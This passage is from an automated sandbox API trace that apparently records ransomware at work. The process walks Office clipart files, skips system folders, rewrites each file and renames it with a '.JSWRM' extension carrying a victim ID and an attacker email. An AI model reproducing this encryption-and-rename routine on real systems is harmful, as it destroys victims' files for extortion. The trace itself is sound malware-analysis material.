Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01659_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01659_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0077.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0077.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0077.956] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x329e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD01660_.WMF", cAlternateFileName="")) returned 1 [0077.956] lstrcmpiW (lpString1="FD01660_.WMF", lpString2=".") returned 1 [0077.956] lstrcmpiW (lpString1="FD01660_.WMF", lpString2="..") returned 1 [0077.956] lstrcmpiW (lpString1="FD01660_.WMF", lpString2="...") returned 1 [0077.956] lstrcmpiW (lpString1="FD01660_.WMF", lpString2="windows") returned -1 [0077.956] lstrcmpiW (lpString1="FD01660_.WMF", lpString2="recovery") returned -1 [0077.956] lstrcmpiW (lpString1="FD01660_.WMF", lpString2="perflogs") returned -1 [0077.956] lstrcmpiW (lpString1="FD01660_.WMF", lpString2="documents and settings") returned 1 [0077.956] lstrcmpiW (lpString1="FD01660_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.957] lstrcmpiW (lpString1="FD01660_.WMF", lpString2="system volume information") returned -1 [0077.957] lstrcmpiW (lpString1="FD01660_.WMF", lpString2="msocache") returned -1 [0077.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0077.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01660_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01660_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01660_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0077.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0077.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01660_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD01660_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD01660_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0077.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0077.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0077.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0077.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01660_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.957] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12958) returned 1 [0077.957] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3290) returned 0x24d210 [0077.958] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3290, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3290, lpOverlapped=0x0) returned 1 [0078.201] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.201] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3290, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3290, lpOverlapped=0x0) returned 1 [0078.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0078.201] CloseHandle (hObject=0x314) returned 1 [0078.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0078.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0078.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0078.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0078.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0078.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0078.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0078.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0078.202] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01660_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01660_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01660_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0078.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0078.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0078.203] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD02068_.WMF", cAlternateFileName="")) returned 1 [0078.203] lstrcmpiW (lpString1="FD02068_.WMF", lpString2=".") returned 1 [0078.203] lstrcmpiW (lpString1="FD02068_.WMF", lpString2="..") returned 1 [0078.203] lstrcmpiW (lpString1="FD02068_.WMF", lpString2="...") returned 1 [0078.203] lstrcmpiW (lpString1="FD02068_.WMF", lpString2="windows") returned -1 [0078.203] lstrcmpiW (lpString1="FD02068_.WMF", lpString2="recovery") returned -1 [0078.205] lstrcmpiW (lpString1="FD02068_.WMF", lpString2="perflogs") returned -1 [0078.205] lstrcmpiW (lpString1="FD02068_.WMF", lpString2="documents and settings") returned 1 [0078.205] lstrcmpiW (lpString1="FD02068_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.205] lstrcmpiW (lpString1="FD02068_.WMF", lpString2="system volume information") returned -1 [0078.205] lstrcmpiW (lpString1="FD02068_.WMF", lpString2="msocache") returned -1 [0078.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0078.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02068_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02068_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02068_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0078.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0078.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02068_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02068_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02068_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0078.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0078.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0078.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0078.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02068_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.206] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2488) returned 1 [0078.206] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9b0) returned 0x20c6c0 [0078.206] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9b0, lpOverlapped=0x0) returned 1 [0078.237] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.237] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9b0, lpOverlapped=0x0) returned 1 [0078.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0078.238] CloseHandle (hObject=0x314) returned 1 [0078.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0078.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0078.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0078.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0078.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0078.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0078.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0078.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0078.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.239] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02068_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02068_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02068_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0078.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0078.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0078.240] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x88c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD02071_.WMF", cAlternateFileName="")) returned 1 [0078.240] lstrcmpiW (lpString1="FD02071_.WMF", lpString2=".") returned 1 [0078.240] lstrcmpiW (lpString1="FD02071_.WMF", lpString2="..") returned 1 [0078.240] lstrcmpiW (lpString1="FD02071_.WMF", lpString2="...") returned 1 [0078.240] lstrcmpiW (lpString1="FD02071_.WMF", lpString2="windows") returned -1 [0078.240] lstrcmpiW (lpString1="FD02071_.WMF", lpString2="recovery") returned -1 [0078.240] lstrcmpiW (lpString1="FD02071_.WMF", lpString2="perflogs") returned -1 [0078.240] lstrcmpiW (lpString1="FD02071_.WMF", lpString2="documents and settings") returned 1 [0078.240] lstrcmpiW (lpString1="FD02071_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.240] lstrcmpiW (lpString1="FD02071_.WMF", lpString2="system volume information") returned -1 [0078.240] lstrcmpiW (lpString1="FD02071_.WMF", lpString2="msocache") returned -1 [0078.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0078.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02071_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02071_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02071_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0078.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0078.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02071_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD02071_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD02071_.WMF", lpUsedDefaultChar=0x0) returned 12 [0078.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0078.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0078.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0078.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0078.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0078.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0078.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02071_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0078.240] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2188) returned 1 [0078.241] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x880) returned 0x20c6c0 [0078.241] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x880, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x880, lpOverlapped=0x0) returned 1 [0078.658] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.658] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x880, lpOverlapped=0x0) returned 1 [0078.658] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0078.658] CloseHandle (hObject=0x314) returned 1 [0078.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0078.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0078.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0078.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0078.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0078.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0078.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0078.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0078.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0078.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0078.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0078.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0078.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0078.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0078.659] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02071_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02071_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02071_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0078.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0078.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0078.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0078.660] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x112c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD02075_.WMF", cAlternateFileName="")) returned 1 [0078.660] lstrcmpiW (lpString1="FD02075_.WMF", lpString2=".") returned 1 [0078.660] lstrcmpiW (lpString1="FD02075_.WMF", lpString2="..") returned 1 [0078.660] lstrcmpiW (lpString1="FD02075_.WMF", lpString2="...") returned 1 [0078.660] lstrcmpiW (lpString1="FD02075_.WMF", lpString2="windows") returned -1 [0078.660] lstrcmpiW (lpString1="FD02075_.WMF", lpString2="recovery") returned -1 [0078.660] lstrcmpiW (lpString1="FD02075_.WMF", lpString2="perflogs") returned -1 [0078.660] lstrcmpiW (lpString1="FD02075_.WMF", lpString2="documents and settings") returned 1 [0078.660] lstrcmpiW (lpString1="FD02075_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0078.660] lstrcmpiW (lpString1="FD02075_.WMF", lpString2="system volume information") returned -1 [0078.660] lstrcmpiW (lpString1="FD02075_.WMF", 